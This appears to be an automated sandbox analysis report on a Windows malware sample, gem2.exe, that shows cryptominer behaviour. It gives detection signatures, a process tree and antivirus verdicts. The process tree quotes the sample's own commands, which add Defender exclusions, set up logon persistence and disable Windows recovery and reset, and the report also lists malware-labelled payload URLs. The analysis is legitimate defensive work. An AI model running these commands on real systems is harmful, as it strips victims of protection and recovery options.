Windows Analysis Report
gem2.exe

Overview

General Information

Sample name: gem2.exe
Analysis ID: 1589411
MD5: be89d598cd96443479c02b022ff70532
SHA1: f0ab69f56ebbbdda791d61fd3d22476d61135871
SHA256: a4c4487dcacebf5048b2266233f5645cfe421154f26e6685ced36aa0621037f1
Tags: 66-63-187-250 exe user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect virtual machines
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • gem2.exe (PID: 2692 cmdline: "C:\Users\user\Desktop\gem2.exe" MD5: BE89D598CD96443479C02B022FF70532)
    • powershell.exe (PID: 4684 cmdline: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7256 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7476 cmdline: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 7628 cmdline: C:\Windows\System32\svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • powercfg.exe (PID: 7700 cmdline: powercfg -change standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7716 cmdline: powercfg -change monitor-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7736 cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7764 cmdline: powercfg /setactive SCHEME_CURRENT MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7804 cmdline: cmd.exe /C reagentc /disable MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ReAgentc.exe (PID: 7968 cmdline: reagentc /disable MD5: A109CC3B919C7D40E4114966340F39E5)
      • cmd.exe (PID: 8032 cmdline: cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8076 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8184 cmdline: cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6708 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7304 cmdline: cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • takeown.exe (PID: 7356 cmdline: takeown /f C:\Windows\System32\reagentc.exe MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • cmd.exe (PID: 2192 cmdline: cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 7516 cmdline: icacls C:\Windows\System32\reagentc.exe /grant administrators:F MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • cmd.exe (PID: 7508 cmdline: cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • icacls.exe (PID: 5520 cmdline: icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X) MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • WMIC.exe (PID: 5988 cmdline: wmic diskdrive get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1552 cmdline: wmic diskdrive get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 2236 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 7788 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • System-f4855f59e0.exe (PID: 7524 cmdline: C:\Windows\System32\System-f4855f59e0.exe MD5: BE89D598CD96443479C02B022FF70532)
  • Microsoft-f4855f59e0.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • powershell.exe (PID: 7992 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE <obfuscated PowerShell command line omitted> MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 1252 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • WinDrive-f4855f59e0.exe (PID: 8168 cmdline: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • Microsoft-f4855f59e0.exe (PID: 2168 cmdline: "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe" MD5: BE89D598CD96443479C02B022FF70532)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, CommandLine|base64offset|contains: H!", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F, ProcessId: 7476, ProcessName: schtasks.exe
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE <obfuscated PowerShell command line omitted>
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE <obfuscated PowerShell command line omitted>
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", ProcessId: 4684, ProcessName: powershell.exe
Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\gem2.exe, ProcessId: 2692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft-f4855f59e0
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -s https://api.ipify.org, CommandLine: curl -s https://api.ipify.org, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\System32\svchost.exe, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 7628, ParentProcessName: svchost.exe, ProcessCommandLine: curl -s https://api.ipify.org, ProcessId: 2236, ProcessName: curl.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8104, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , ProcessId: 8168, ProcessName: WinDrive-f4855f59e0.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", ProcessId: 4684, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllPAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuAvira URL Cloud: Label: malware
Source: https://pastesnap.com/(WAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2UAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuAvira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/Avira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5Avira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwR.txtAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4cAvira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txtAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60Avira URL Cloud: Label: malware
Source: https://pastesnap.com/0xYAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuebAvira URL Cloud: Label: malware
Source: https://pastesnap.com/KhAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmFAvira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Windows\System32\System-f4855f59e0.exeReversingLabs: Detection: 52%
Source: gem2.exeReversingLabs: Detection: 52%
Source: gem2.exeVirustotal: Detection: 62%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\System-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeJoe Sandbox ML: detected
Source: gem2.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A51C0 Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,14_2_00007FF6A54A51C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,16_2_00000173D01B04A6
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01974E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,16_2_00000173D01974E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0197560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D0197560
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01975F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01975F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01816F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01816F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0181820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,16_2_00000173D0181820
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01818B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01818B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01818A0 CryptHashData,16_2_00000173D01818A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B28A0 CertGetNameStringW,malloc,CertFindExtension,CryptDecodeObjectEx,free,free,CertFreeCertificateContext,16_2_00000173D01B28A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0162B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,16_2_00000173D0162B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,16_2_00000173D01B2CC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01AFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01AFF30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,16_2_00000173D01B31F0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16351C0 Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,17_2_00007FF7D16351C0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,25_2_00401000
Source: C:\Windows\System32\svchost.exeCode function: -----BEGIN PUBLIC KEY-----16_2_00000173D01B4560
Source: svchost.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\svchost.exeCode function: mov dword ptr [rbp+04h], 424D53FFh16_2_00000173D0198DE0

Bitcoin Miner

Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: --url stratum+tcp://
Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\7\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: svchost.exe, 00000010.00000002.2553572741.00000173CDFF5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: svchost.exe, 00000010.00000002.2553168813.00000173CDFE0000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb%%" source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: svchost.exe, 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000010.00000002.2557783221.00000173CFFDA000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
